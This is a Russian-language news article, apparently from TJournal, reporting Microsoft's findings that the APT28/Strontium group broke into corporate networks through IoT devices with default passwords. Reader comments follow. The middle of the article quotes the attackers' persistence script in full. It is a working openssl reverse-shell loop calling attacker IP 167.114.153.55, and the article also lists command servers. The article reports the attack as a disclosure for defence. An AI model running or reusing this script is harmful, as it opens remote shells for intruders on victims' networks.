Жыве Беларусь

Microsoft рассказала об атаках русских хакеров на корпоративные сети через устройства «интернета вещей» Материал редакции

Целью стали VOIP-телефоны, офисные принтеры и видеодекодеры.

В закладки

Специалисты Центра анализа угроз Microsoft обнаружили атаки на корпоративные сети через устройства «интернета вещей» со стороны группировки Strontium. В некоторых случаях хакерам даже не приходилось ничего взламывать: достаточно было ввести заводские пароли.

В Microsoft обнаружили как минимум три случая подобных атак. Злоумышленники пытались получить доступ к внутренней сети через VOIP-телефон, офисный принтер и видеодекодер. В двух случаях оказалось достаточно ввести заводской пароль, а на третьем устройстве не было установлено последнее обновление безопасности.

Устройства использовали в качестве точки входа. Через них хакеры проникли в сеть и начали сканировать её в поиске других незащищённых устройств с учётными записями с высокими привилегиями.

После получения доступа к каждому из устройств злоумышленники устанавливали скрипт для сниффинга (перехвата) трафика в локальной сети. При перемещении между устройствами хакеры также внедряли скрипт для укоренения в системе.

—contents of [IOT Device] file--

#!/bin/sh

export [IOT Device] ="-qws -display :1 -nomouse"

echo 1|tee /tmp/.c;sh -c '(until (sh -c "openssl s_client -quiet -host

167.114.153.55 -port 443 |while : ; do sh && break; done| openssl

s_client -quiet -host 167.114.153.55 -port 443"); do (sleep 10 &&

cn=$((`cat /tmp/.c`+1)) && echo $cn|tee /tmp.c && if [ $cn -ge 30 ];

then (rm /tmp/.c;pkill -f 'openssl'); fi);done)&' &

--end contents of file--

скрипт для поддержания присутствия хакеров в сети

В Microsoft выяснили, что злоумышленники управляли устройствами с помощью удалённого сервера с IP-адресов 167.114.153.55, 94.237.37.28, 82.118.242.171, 31.220.61.251 и 128.199.199.187. Специалисты считают, что хакеры связаны с группировкой Strontium («Стронций»), также известной как Fancy Bear и APT28.

Эксперты по кибербезопасности и СМИ утверждают, что Fancy Bear связана с российским правительством. Группировке приписывают взлом демпартии США в 2016 году, попытки взломать американских чиновников и помешать европейским выборам в 2019 году.

Так как атаки на устройства «интернета вещей» Microsoft заметила на ранних стадиях, специалисты не установили конечную цель хакеров. Как отметили в компании, только за последние 12 месяцев сотрудники разослали 1400 уведомлений об атаках Strontium по всему миру. Большая часть целей относилась в государственной, IT, военной, оборонной, медицинской, образовательной и инженерной областям.

Выпускающий редактор TJ. По работе писать на damir@tjournal.ru. Личные соцсети: Twitter — для коротких быстрых мнений Facebook — для работы Instagram — красивые (и не очень) фоточки из жизни на разные смартфоны, которые попадают мне в руки
{ "author_name": "Дамир Камалетдинов", "author_type": "editor", "tags": ["\u0445\u0430\u043a\u0435\u0440\u044b","\u043d\u043e\u0432\u043e\u0441\u0442\u0438","\u0430\u0442\u0430\u043a\u0438","microsoft"], "comments": 10, "likes": 19, "favorites": 3, "is_advertisement": false, "subsite_label": "news", "id": 110066, "is_wide": false, "is_ugc": false, "date": "Tue, 06 Aug 2019 20:17:37 +0300", "is_special": false }
Объявление на TJ
0
10 комментариев
Популярные
По порядку
Написать комментарий...

Экономический франт

–4

А может мне кто объяснить нафига принтер и телефон в интернет вытаскивать ?
PS Всё что надо знать про IoT, благодаря безумству маркетолог теперь можно взломать микрософт через чайник.

Ответить

Замечательный пистолет

Экономический
4

поскольку 99% IOT делают голожопые стартаперы дырок там немеряно

Ответить
3

Комментарий удален по просьбе пользователя

Ответить

Экономический франт

Илюхер
0

Хреново понимаешь.

Ответить

Экономический франт

Илюхер
–1

Причем тут офис ?

Ответить
0

Комментарий удален по просьбе пользователя

Ответить

Экономический франт

Илюхер
0

Ты айтишник из местной группы детсада ?
Иначе у тебя не было бы глупых вопросов.
" нафига принтер и телефон в интернет вытаскивать "

Ответить

Экономический франт

Илюхер
0

Бля даже в их посте всё есть.

Recommendations for Securing Enterprise IoT

There are additional steps an organization can take to protect their infrastructure and network from similar activity. Microsoft recommends the following actions to better secure and manage risk associated with IoT devices:

Require approval and cataloging of any IoT devices running in your corporate environment.
Develop a custom security policy for each IoT device.
Avoid exposing IoT devices directly to the internet or create custom access controls to limit exposure.
Use a separate network for IoT devices if feasible.
Conduct routine configuration/patch audits against deployed IoT devices.
Define policies for isolation of IoT devices, preservation of device data, ability to maintain logs of device traffic, and capture of device images for forensic investigation.
Include IoT device configuration weaknesses or IoT-based intrusion scenarios as part of Red Team testing.
Monitor IoT device activity for abnormal behavior (e.g. a printer browsing SharePoint sites…).
Audit any identities and credentials that have authorized access to IoT devices, users and processes.
Centralize asset/configuration/patch management if feasible.
If your devices are deployed/managed by a 3rd party, include explicit Terms in your contracts detailing security practices to be followed and Audits that report security status and health of all managed devices.
Where possible, define SLA Terms in IoT device vendor contracts that set a mutually acceptable window for investigative response and forensic analysis to any compromise involving their product.

Ответить
0

Произошёл взлом жопы

Ответить
0

Это все чайники.

Ответить
Обсуждаемое
Интернет
#ЖывеБеларусь: в соцсетях массово поддерживают протестующих и намекают на проведение аналогичных акций в России
Одни ждут президентских выборов в 2024 году, а другие предлагают действовать уже сейчас.
Новости
«Я не хочу крови и насилия»: Тихановская обратилась к белорусам с просьбой не противостоять милиции
Видео записано при неясных обстоятельствах.
Новости
В российской вакцине от Covid-19 неизвестна длительность иммунитета, а у 38 добровольцев нашли 144 побочных эффекта
Российскую вакцину зарегистрировали без третьего этапа исследований.
Популярное за три дня
Новости
Фото: Протестующий и силовик в Бресте
На стихийный митинг против результатов президентских выборов в городе собрались тысячи людей.
Дизайн и архитектура
Фото: Чёрно-белая «радуга» на граффити в Екатеринбурге
Кодировка вместо цвета.
Интернет
#ЖывеБеларусь: в соцсетях массово поддерживают протестующих и намекают на проведение аналогичных акций в России
Одни ждут президентских выборов в 2024 году, а другие предлагают действовать уже сейчас.

Комментарии